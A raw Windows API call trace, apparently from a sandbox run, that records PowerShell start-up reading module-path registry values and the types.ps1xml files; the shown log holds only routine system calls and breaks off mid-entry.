[0073.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0073.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0073.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0073.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0073.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0073.317] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0073.317] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33 [0073.317] CoTaskMemFree (pv=0x3e46f0) [0073.319] CoTaskMemAlloc (cb=0xcc) returned 0x1b3d2390 [0073.319] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b3d2390, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0073.319] CoTaskMemFree (pv=0x1b3d2390) [0073.319] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad788 | out: phkResult=0x1ad788*=0x340) returned 0x0 [0073.319] RegQueryValueExW (in: hKey=0x340, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1ad70c, lpData=0x0, lpcbData=0x1ad708*=0x0 | out: lpType=0x1ad70c*=0x2, lpData=0x0, lpcbData=0x1ad708*=0x6c) returned 0x0 [0073.320] CoTaskMemAlloc (cb=0x70) returned 0x41a760 [0073.320] RegQueryValueExW (in: hKey=0x340, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1ad6dc, lpData=0x41a760, lpcbData=0x1ad6d8*=0x6c | out: lpType=0x1ad6dc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x1ad6d8*=0x6c) returned 0x0 [0073.320] CoTaskMemFree (pv=0x41a760) [0073.320] CoTaskMemAlloc (cb=0xcc) returned 0x1b3d2390 [0073.320] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b3d2390, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb [0073.320] CoTaskMemFree (pv=0x1b3d2390) [0073.320] CoTaskMemAlloc (cb=0xcc) returned 0x1b3d2390 [0073.320] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b3d2390, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0073.320] CoTaskMemFree (pv=0x1b3d2390) [0073.323] RegCloseKey (hKey=0x340) returned 0x0 [0073.323] CoTaskMemAlloc (cb=0xcc) returned 0x1b3d2390 [0073.324] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b3d2390, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0073.324] CoTaskMemFree (pv=0x1b3d2390) [0073.324] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad788 | out: phkResult=0x1ad788*=0x340) returned 0x0 [0073.324] RegQueryValueExW (in: hKey=0x340, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1ad70c, lpData=0x0, lpcbData=0x1ad708*=0x0 | out: lpType=0x1ad70c*=0x0, lpData=0x0, lpcbData=0x1ad708*=0x0) returned 0x2 [0073.324] RegCloseKey (hKey=0x340) returned 0x0 [0073.340] CoTaskMemAlloc (cb=0x20c) returned 0x472bd0 [0073.340] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x472bd0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0 [0073.341] CoTaskMemFree (pv=0x472bd0) [0073.341] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1ad310, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0073.343] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1 [0073.349] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0073.349] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0073.349] CoTaskMemFree (pv=0x3e46f0) [0073.350] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0073.350] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0073.350] CoTaskMemFree (pv=0x3e46f0) [0073.356] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0073.356] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0073.356] CoTaskMemFree (pv=0x3e46f0) [0073.356] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0073.356] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0073.356] CoTaskMemFree (pv=0x3e46f0) [0073.359] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad578 | out: phkResult=0x1ad578*=0x348) returned 0x0 [0073.360] RegQueryValueExW (in: hKey=0x348, lpValueName="path", lpReserved=0x0, lpType=0x1ad58c, lpData=0x0, lpcbData=0x1ad588*=0x0 | out: lpType=0x1ad58c*=0x1, lpData=0x0, lpcbData=0x1ad588*=0x74) returned 0x0 [0073.361] RegQueryValueExW (in: hKey=0x348, lpValueName="path", lpReserved=0x0, lpType=0x1ad4fc, lpData=0x0, lpcbData=0x1ad4f8*=0x0 | out: lpType=0x1ad4fc*=0x1, lpData=0x0, lpcbData=0x1ad4f8*=0x74) returned 0x0 [0073.361] CoTaskMemAlloc (cb=0x78) returned 0x41a760 [0073.361] RegQueryValueExW (in: hKey=0x348, lpValueName="path", lpReserved=0x0, lpType=0x1ad4cc, lpData=0x41a760, lpcbData=0x1ad4c8*=0x74 | out: lpType=0x1ad4cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1ad4c8*=0x74) returned 0x0 [0073.361] CoTaskMemFree (pv=0x41a760) [0073.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1ad240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0073.361] SetErrorMode (uMode=0x1) returned 0x1 [0073.361] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1ad450 | out: lpFileInformation=0x1ad450*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0073.361] SetErrorMode (uMode=0x1) returned 0x1 [0073.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0073.364] SetErrorMode (uMode=0x1) returned 0x1 [0073.364] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad450 | out: lpFileInformation=0x1ad450*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0073.365] SetErrorMode (uMode=0x1) returned 0x1 [0073.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0073.369] SetErrorMode (uMode=0x1) returned 0x1 [0073.369] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad450 | out: lpFileInformation=0x1ad450*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0073.369] SetErrorMode (uMode=0x1) returned 0x1 [0073.372] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0073.372] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0073.373] CoTaskMemFree (pv=0x3e46f0) [0073.380] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0073.380] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0073.380] CoTaskMemFree (pv=0x3e46f0) [0073.382] GetACP () returned 0x4e4 [0073.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0073.389] SetErrorMode (uMode=0x1) returned 0x1 [0073.390] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x34c [0073.390] GetFileType (hFile=0x34c) returned 0x1 [0073.390] SetErrorMode (uMode=0x1) returned 0x1 [0073.390] GetFileType (hFile=0x34c) returned 0x1 [0073.394] ReadFile (in: hFile=0x34c, lpBuffer=0x2e8d2e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2e8d2e0*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.397] ReadFile (in: hFile=0x34c, lpBuffer=0x2e8d2e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2e8d2e0*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.398] ReadFile (in: hFile=0x34c, lpBuffer=0x2e8d2e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2e8d2e0*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.398] ReadFile (in: hFile=0x34c, lpBuffer=0x2e8d2e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2e8d2e0*, lpNumberOfBytesRead=0x1ad388*=0xcf3, lpOverlapped=0x0) returned 1 [0073.398] ReadFile (in: hFile=0x34c, lpBuffer=0x2e8c73b, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2e8c73b*, lpNumberOfBytesRead=0x1ad388*=0x0, lpOverlapped=0x0) returned 1 [0073.398] ReadFile (in: hFile=0x34c, lpBuffer=0x2e8d2e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2e8d2e0*, lpNumberOfBytesRead=0x1ad388*=0x0, lpOverlapped=0x0) returned 1 [0073.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0073.403] SetErrorMode (uMode=0x1) returned 0x1 [0073.403] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad300 | out: lpFileInformation=0x1ad300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0073.403] SetErrorMode (uMode=0x1) returned 0x1 [0073.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0073.405] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3e8 | out: phkResult=0x1ad3e8*=0x34c) returned 0x0 [0073.405] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad36c, lpData=0x0, lpcbData=0x1ad368*=0x0 | out: lpType=0x1ad36c*=0x1, lpData=0x0, lpcbData=0x1ad368*=0x56) returned 0x0 [0073.405] CoTaskMemAlloc (cb=0x5a) returned 0x48d200 [0073.405] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad33c, lpData=0x48d200, lpcbData=0x1ad338*=0x56 | out: lpType=0x1ad33c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad338*=0x56) returned 0x0 [0073.405] CoTaskMemFree (pv=0x48d200) [0073.405] RegCloseKey (hKey=0x34c) returned 0x0 [0073.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0073.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1acee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0073.459] GetSystemInfo (in: lpSystemInfo=0x1ac020 | out: lpSystemInfo=0x1ac020*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0073.459] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0073.486] SetErrorMode (uMode=0x1) returned 0x1 [0073.486] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x34c [0073.487] GetFileType (hFile=0x34c) returned 0x1 [0073.487] SetErrorMode (uMode=0x1) returned 0x1 [0073.487] GetFileType (hFile=0x34c) returned 0x1 [0073.499] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.500] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.500] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.500] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.500] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.500] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.501] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.501] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.501] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.502] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.502] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.503] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.503] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.503] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.503] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.504] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.504] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.506] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.506] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.506] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.506] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.507] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.507] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.507] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.507] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.508] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.508] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.508] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.509] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.509] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, 